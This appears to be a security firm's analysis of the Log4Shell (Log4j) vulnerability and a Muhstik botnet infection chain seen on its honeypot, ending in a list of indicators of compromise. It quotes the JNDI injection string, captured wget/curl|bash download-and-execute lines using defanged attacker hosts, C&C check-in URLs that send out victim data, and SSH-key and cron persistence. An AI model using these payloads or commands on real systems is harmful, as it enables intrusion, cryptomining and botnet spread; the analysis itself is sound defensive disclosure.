Critical Log4Shell (Apache Log4j) Zero-Day Attack Analysis

Critical Log4Shell (Apache Log4j) Zero-Day Attack Analysis

At the end of last week (Friday, December 10), the cybersecurity world became aware of a new zero-day vulnerability in the Apache Log4j logging utility that has been allowing easy-to-exploit remote code execution (RCE). (More news here). Coupled with the popularity of this tool, multiple companies and commercial applications have become affected by it (partial list here). It received a codename Log4Shell (CVE-2021-44228). In addition to promptly deploying several protection mechanisms for our customers, Nozomi Networks set up a honeypot to monitor the situation and became aware of all potential global scans and exploitation attempts.

Apache quickly categorized the vulnerability as critical due to the simplicity of the attack and the number of susceptible platforms and systems. All an attacker has to do is send a malicious string that would be logged by the server. Minecraft users were exploiting servers using the chat function, and Twitter users could trigger the exploit by changing their display names, as could iPhone users by changing their phone name. In this post, we provide some technical details related to how malware authors immediately started taking advantage of this vulnerability.

Finally, we have added attack diagnostics and countermeasures to our Threat Intelligence service and are closely monitoring the evolving situation to improve our coverage. Our products are not subject to this vulnerability as we do not use the Apache utility.

The essence of the vulnerability lies in the fact that the log4j utility had message lookup substitution enabled by default. As a result, attackers can craft a special request that would make the utility remotely download and execute the payload. Here is the most common example of it using the combination of JNDI and LDAP:

${jndi:ldap://<host>:<port>/<payload_path>}

Other protocols like DNS, RMI and LDAPS may also be misused. This behavior has been fixed in the recent release of Apache Log4j 2.16.0.

As most web systems log all incoming user requests, providing the above-mentioned pattern in any form of the user input (for example, in HTTP headers, or URL paths) may become a successful attack vector. Once the system receives the request and the vulnerability is triggered, the payload will be downloaded. Here is an example of its format:

Payload format example

This will make the vulnerable application download and execute the compiled Java class located at the<base_url>/<payload_filename>.class location

Global Scans for Log4Shell

Once the vulnerability became known to the public, both cybersecurity researchers and malware authors started scanning the internet, searching for vulnerable hosts. In addition, various attackers started experimenting with the vulnerability to explore ways that the payload can be delivered and how it can be obfuscated to bypass signature detection.

Here are some examples of what we caught using our honeypot:

Honeypot example
Honeypot logs
Honeypot logs.

Malicious Payloads

Here is an example of the full infection chain associated with the Muhstik botnet that we analyzed:

1. The initial stage payload ${jndi:ldap://45.130.229[.]168:1389/Exploit} was provided in various HTTP headers and as part of URL paths.

2. Once downloaded, it contained the following information

Initial stage payload

This will make the victim download the next stage payload hxxp://31.220.58.29/Exploit.class.

3. Once downloaded and decompiled, the downloaded Exploit.class reveals the following functionality:

Exploit.class functionality

As we can see here, it will download and execute the next stage payload in the form of a shell script from hxxp://18.228.7.109/.log/log

4. log script contains the following functionality:

wget -O /tmp/pty3 hxxp://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &

wget -O /tmp/pty4 hxxp://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &

wget -O /tmp/pty2 hxxp://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &

wget -O /tmp/pty1 hxxp://18.228.7.109/.log/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 &

wget -O /tmp/pty3 hxxp://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &

wget -O /tmp/pty5 hxxp://18.228.7.109/.log/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 &

(curl hxxp://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO – hxxp://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash

(curl hxxp://159.89.182.117/wp-content/themes/twentyseventeen/ldm || wget -qO - hxxp://159.89.182.117/wp-content/themes/twentyseventeen/ldm)|bash

Here, the malware downloads and executes various executables followed by several scripts.

5. Looking at payloads pty1-pty5, we can see that these are executables compiled for various architectures, a common scenario for IoT threats.


$ file pty1
pty1: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
$ file pty2
pty2: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
$ file pty3
pty3: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, no section header
$ file pty4
pty4: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
$ file pty5
pty5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, no section header

Reverse engineering them, we can see these are typical packed Muhstik botnet payloads.

List of commands supported by binary payloads
List of commands supported by binary payloads.

6. The main goal of the m8 script is to deliver and run another binary payload located at hxxp://138.197.206.223/.x/xmra32 or hxxp://138.197.206.223/.x/xmra64 (depending on the victim’s architecture) and save it under the name .kswapd. This is a cryptocurrency miner. The pool addresses used by it are 185.165.171.78:8081 and 185.86.148.14:8081.

The beginning of the m8 script
The beginning of the m8 script.

7. The script ldm is quite big compared to m8, with whom it has some shared code related to handling cryptocurrency mining software. This time the C&C bvprzqhoz7j2ltin.onion is hosted on DarkNet and can also be accessed via SOCKS proxies as well as proxy services:

  • bvprzqhoz7j2ltin.tor2web.su
  • bvprzqhoz7j2ltin.onion.ly
  • bvprzqhoz7j2ltin.onion.ws

The malware establishes persistence on the affected machine by adding the attackers’ public key to the list of authorized ssh keys.

ldm payload adds attackers’ public SSH keys to the list of authorized keys
ldm payload adds attackers’ public SSH keys to the list of authorized keys.

In addition, the script sets up cron jobs to periodically self-update from https://<C&C_domain>/src/ldm

ldm payload achieves persistence by using cron jobs
ldm payload achieves persistence by using cron jobs.

Each infection is reported to the following C&C addresses:

  • hxxps://<C&C_domain>/rsl.php?ip=${net}&login=$(whoami)
  • hxxps://<C&C_domain>/src/main

In case of the first URL, ${net} is the victim’s public IP address and $(whoami) is the affected user. For the second URL, the information about the affected machine and user is exfiltrated in the Referer HTTP header, as a response malware expects a shell script to execute.

Malware is also capable of doing the lateral movement by extracting the SSH keys and building a list of machines from the bash history and SSH configs and known hosts. The following payloads are downloaded and executed on these next stage machines in case of successful connection:

  • hxxp://34.221.40.237/.x/1sh
  • hxxp://34.221.40.237/.x/3sh

The main purpose of them is remarkably similar to the log script mentioned above – download and execute additional payloads, even the file names are the same:

The body of the 1sh script used as part of lateral movement
The body of the 1sh script used as part of lateral movement.

As we can see, there are two new payloads here compared to the log script, one for another ARM and one for PowerPC architectures:


$ file pty10

pty10: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header

$ file pty11

pty11: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (GNU/Linux), statically linked, no section header

Conclusion

This is a critical vulnerability that is affecting a wide range of systems and users. It is very easy to exploit so many attackers are testing out the new vulnerability very rapidly. Users should upgrade quickly their Apache logging utility to Log4j 2.16.0 or alternatively apply one of the workarounds provided by the vendor: https://logging.apache.org/log4j/2.x/security.html.

Nozomi Networks customers will be able to leverage our Threat Intelligence service for the latest countermeasures to this exploit.

List of IOCs

  • 150.158.189.96
  • 1.116.59.211
  • 61.19.25.207
  • 31.220.58.29
  • 45.130.229.168:1389
  • 185.165.171.78:8081
  • 185.86.148.14:8081
  • hxxp://31.220.58.29/Exploit.class
  • hxxp://18.228.7.109/.log/log
  • hxxp://18.228.7.109/.log/pty5
  • hxxp://18.228.7.109/.log/pty4
  • hxxp://18.228.7.109/.log/pty3
  • hxxp://18.228.7.109/.log/pty2
  • hxxp://18.228.7.109/.log/pty1
  • hxxp://34.221.40.237/.x/pty11
  • hxxp://34.221.40.237/.x/pty10
  • hxxp://34.221.40.237/.x/pty5
  • hxxp://34.221.40.237/.x/pty4
  • hxxp://34.221.40.237/.x/pty3
  • hxxp://34.221.40.237/.x/pty2
  • hxxp://34.221.40.237/.x/pty1
  • hxxp://34.221.40.237/.x/1sh
  • hxxp://34.221.40.237/.x/3sh
  • hxxp://210.141.105.67:80/wp-content/themes/twentythirteen/m8
  • hxxp://159.89.182.117/wp-content/themes/twentyseventeen/ldm
  • hxxp://157.230.189.52/wp-content/themes/twentynineteen/ldm
  • hxxps://bvprzqhoz7j2ltin[.]tor2web.su/src/ldm
  • hxxps://bvprzqhoz7j2ltin[.]onion.ly/src/ldm
  • hxxps://bvprzqhoz7j2ltin[.]onion.ws/src/ldm
  • hxxps://bvprzqhoz7j2ltin[.]tor2web.su/src/main
  • hxxps://bvprzqhoz7j2ltin[.]onion.ly/src/main
  • hxxps://bvprzqhoz7j2ltin[.]onion.ws/src/main
  • 15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b
  • 9db49e8da667d03c6f758bafa156d0dccb6433ca3f37b3cd94170f749048b779
  • 3025630185ea8a3781422351a8a4d415b3f47ed242a70e53fb0d8755ddd01b63
  • 5fb63deb96eb24a181a58401882d064fc112036aab52a1126fbf254e07562595
  • eddcd0d13b461e60a52060fc8b60ddb06c552ff645ee557c40b43052ee35b029
  • 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
  • b74b2907b3b47fcbdab5054ec3ae8a46c7c330fa60d637e735ce9fe73d9ab687
  • 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
  • e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80
  • 715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7
  • a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce
  • c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799
  • 19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d
  • 6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b
  • 63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9
  • b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0
  • 5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28